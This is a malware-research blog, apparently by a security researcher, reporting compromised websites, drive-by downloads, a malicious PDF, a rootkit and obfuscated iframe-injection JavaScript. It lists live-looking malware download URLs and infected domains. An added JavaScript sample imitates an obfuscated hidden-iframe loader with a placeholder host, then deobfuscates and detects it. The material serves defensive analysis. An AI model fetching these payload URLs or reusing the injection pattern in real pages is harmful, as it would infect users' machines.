Malware in a rar
The following site (Russian language), igra.newvksoft.org.ua, downloads a rar file onto your computer.
If you extract the file you will get this:
file.exe is malware
It’s not often I see malware coming through a rar file.
Did you know? The rar file compression format was developed by a Russian software engineer, Eugene Roshal.
It probably is just a coincidence that this file also targets Russian users.
Jerome
Malware ID: 8a0a4749ddd176c08f4c58d8a52a866c.zip
Warning: all links contained in this post may infect your computer!
|
miekiemoes has a secret admirer
The following Czech site (otylkaaotesanek.cz) contains an exploit:
In Google Chrome you will see a PDF automatically downloaded (thankfully I did not have Adobe Reader installed on this machine).
The malware author took the time to credit this PDF to security researcher miekiemoes. That sounds pretty similar to a Dancho Danchev fan club.

This is a malicious PDF:
Only one AV vendor from Virus Total (Sophos) detected this threat:
Opening the PDF with a vulnerable version of Adobe Reader will launch the following payload:
dom2cn.cn/13b/load.php?spl=pdf_exp
jzion.cn/etc242342534252435223/1.php
jzion.cn/etc242342534252435223/soft14.exe
The last file is a Trojan detected by 35% of the AV vendors from Virus Total, at the time of writing.
Jerome Segura
Malware ID: t1L8XD644LtNd.pdf.zip
Warning: all links contained in this post may infect your computer!
|
Ambassadors for education’s site compromised
globalfundforeducation.org has been compromised.
Obfuscated JavaScript:
A little bit of fiddling around with the JS code allows us to display what it actually does:
An iframe:

Which is also referenced in the main code:
The final payload seemed to come from soft-siski.com in the form of several executables.
Jerome Segura
Warning: all links contained in this post may infect your computer!
|
Site ‘Under construction’ hosts malware
Our Honeypots caught the following site: dataprovedor.com.
Is this site really under construction? It looks like some kind of web portal.
Regardless, let’s get to the subject that got us here in the first place: The malware.
In a subdirectory called images you can see two files: one is an exe, the other a php which redirects to the exe.
I found it rather smart that the file name for the exe is in the form of DSCXXXXX. For those who own a Sony camera (or possibly other Sony products), this is the default name under which images are saved.
So, one bonus point for the social engineering trick.
The time stamp also indicates that those files have been uploaded recently, to what I think is a hacked server.
The online file checker Jotti reveals that the file may be part of the Banload Trojan family, but it is poorly detected at the time of writing:
Jerome Segura
Malware ID: 2b65626b2442521307d68a53c0b5e6aa.zip
|
Spy on your wife, get infected
Our HoneyPots caught this site spymycomputer.com and one of its products “spy man”
I decided to take a closer look:
First, as reported by our HoneyPots, the site initiates two drive-bys:
The drive-by files are not very well detected yet, as this VirusTotal scan shows:
The source code of spymycomputer.com contains 3 iframes:
frantsuz.com was listed by Google: http://google.com/safebrowsing/diagnostic?site=frantsuz.com/
abbcp.cn is already blacklisted by our friend Steven Burn over at hpHosts:
As far as the software itself, “Spy Man” you may want to think about it twice before installing it:
Keylogging programs have always had a bad reputation… Well, the name itself, “Spy Man”, sounds a little bit like a Cold War espionage character.
Jerome Segura
Malware ID: 8cbe7e2692a5bdaabfc6b2253c7624e7.zip
Malware ID: f00173d0a26085d3333578f2d90e5c64.zip
|
‘Welcome to Bulgaria’ site infected…
Our HoneyPots caught this site as being malicious: legal.bg
They also gave us the drive-by download:
git77.biz/myy/dateoiou1.exe
But I wanted to know more on how this happened…
The Bulgarian site contains obfuscated Javascript:
And a particularly long piece of Unicode with a lot of ‘V’s in it:
The new variable uses the “split” function to clear the ‘V’s out of the way.
Another variable is set up as a string:
Then a ‘for’ loop goes through each single character of the long variable without the ‘V’s:
Finally, the document.write method adds the final piece of the puzzle, which is an iframe, while making sure it stays hidden. The hiding part is defined in the long piece of Unicode as “opacity=0” (more on that later).
So, how did we deobfuscate this?
Well, we commented out the blue code above… and used our own document.write.
It basically takes the variable containing the iframe and writes it with a space between each character. That way, we can print it without it being hidden by the opacity argument. This is what it looks like, in clear text:
So what about those iframes that are 0 in width and in height? Too easy to detect… Yes, probably. This one is “in your face” (width="480" height="60") and yet totally invisible.
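As an added example (not code from the original post), the analysis step above in JavaScript: a constructed script mimics the ‘V’-separated string, the split and the for loop, and a replacement document.write captures the iframe markup instead of rendering it; a small check then flags iframes hidden by opacity or by zero size. The host name in the sample is a placeholder, not the real destination.

```javascript
// Constructed sample (not the real script): the iframe markup is stored as
// decimal char codes separated by 'V'; split() strips them, a for loop rebuilds
// the string and document.write() injects it, as described in the post.
function encodeWithV(text) {
  return Array.from(text, (c) => c.charCodeAt(0)).join("V");
}

// Placeholder host; the real iframe destination is not reproduced here.
const PAYLOAD = '<iframe src="http://example.invalid/x.php" width="480" ' +
  'height="60" style="opacity:0"></iframe>';

const SAMPLE_SCRIPT = `
var blob = "${encodeWithV(PAYLOAD)}";
var parts = blob.split("V");
var out = "";
for (var i = 0; i < parts.length; i++) { out += String.fromCharCode(parts[i]); }
document.write(out);
`;

// The analyst's trick from the post: hand the script our own document.write
// that records instead of rendering. Both 'document' and 'window' are shadowed
// so no real DOM is reachable; still run real samples only in an isolated VM.
function captureDocumentWrite(scriptText) {
  const written = [];
  const fakeDocument = { write: (s) => written.push(String(s)) };
  new Function("document", "window", scriptText)(fakeDocument, {});
  return written.join("");
}

// Report iframes hidden by opacity 0 (quoted as "opacity=0" in the post) or by
// zero width/height, so both flavours of invisible iframe get flagged.
function findHiddenIframes(html) {
  const findings = [];
  const tagRe = /<iframe\b[^>]*>/gi;
  let m;
  while ((m = tagRe.exec(html)) !== null) {
    const tag = m[0];
    const src = (tag.match(/\bsrc\s*=\s*["']([^"']*)["']/i) || [])[1] || "";
    const reasons = [];
    if (/opacity\s*[:=]\s*["']?0(?![.\d])/i.test(tag)) reasons.push("opacity:0");
    if (/\b(?:width|height)\s*=\s*["']?0["'\s>]/i.test(tag)) reasons.push("zero-size");
    if (reasons.length > 0) findings.push({ src, reasons });
  }
  return findings;
}

const decoded = captureDocumentWrite(SAMPLE_SCRIPT);
console.log(decoded, findHiddenIframes(decoded));
```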
The final payload is an executable detected on VirusTotal as:
Thanks to Newaz Rafiq for his help on the deobfuscation part.
Jerome Segura
Malware ID: 4e1741d0a991ada20b9a788f2074f0ba.zip
Updated to add: This seems to be using the Fragus exploit kit. More info here from MalwareDomainList. (Thanks to MalwareScene)
|
Spa site gets `rootkited`
I came across this spa’s website today, which is hosting a rootkit.
The full URL is: www.landmarkspa.com/pdf/wq.exe
The file itself came up as clean as soap on VirusTotal:
Upon running it though, the file immediately deleted itself and created a service.
That service, or rootkit, is detected by a few AV Vendors:
Playing with the new (free) version of McAfee FileInsight:
The screenshot below shows the rootkit name and… a lot of padding… an easy way to bypass signature detection.
Jerome Segura
Malware ID: f535708ce6190267e16ee8e22d5d4917.zip
|
Imageshack.us typo pushes malware
lmageshack.us (an ‘L’ in place of an ‘i’):
It redirects you to a compromised site hosting malware:
The exact path is: www.powerpress.ch/images/img327.scr
VirusTotal analysis:
Jerome Segura
Malware ID: e766415f02909b548f64071fe904bcb6.zip
|
Angelina and Zango cash
I came across the following site today: angelinajmovies.cn
If you browse the site you immediately get a file:
which VirusTotal detects as:
If you refresh the page you now get this second file (sorry I used Firefox here, but you get the same result in IE):
which VirusTotal detects as:
And if you refresh the page angelinajmovies.cn for a third time you get:
Wait, let’s zoom in a little bit:
Yes, you see it right, Zango it is.
Dreamcatcher player, sorry DreamMediaPlayer or whatever.
The landing page reminds me so much of the fake codec pages. I bet they might even have used the same template.
Bad on all fronts!
Jerome Segura
Malware ID: 67e252ee84a6b5d0e2706ccc3e36a106.zip
Malware ID: bea4676cddd48770b56c54db8b07f370.zip
Malware ID: c115d8251fe12d92567e55cad1d379e9.zip
|
French site serves malware
I noticed a French site hit our traps… As a Frenchman I thought I’d check.
agencedelamairie.fr is hosting malware (agencedelamairie.fr/images/bouton/Explorer8.exe)
It is a realtor site, although not very functional at the moment.
The file detection on Virus Total:
The site’s owner has been contacted.
Jerome Segura
Malware ID: d481046cb2f05e656100556fabbaf4e7.zip
|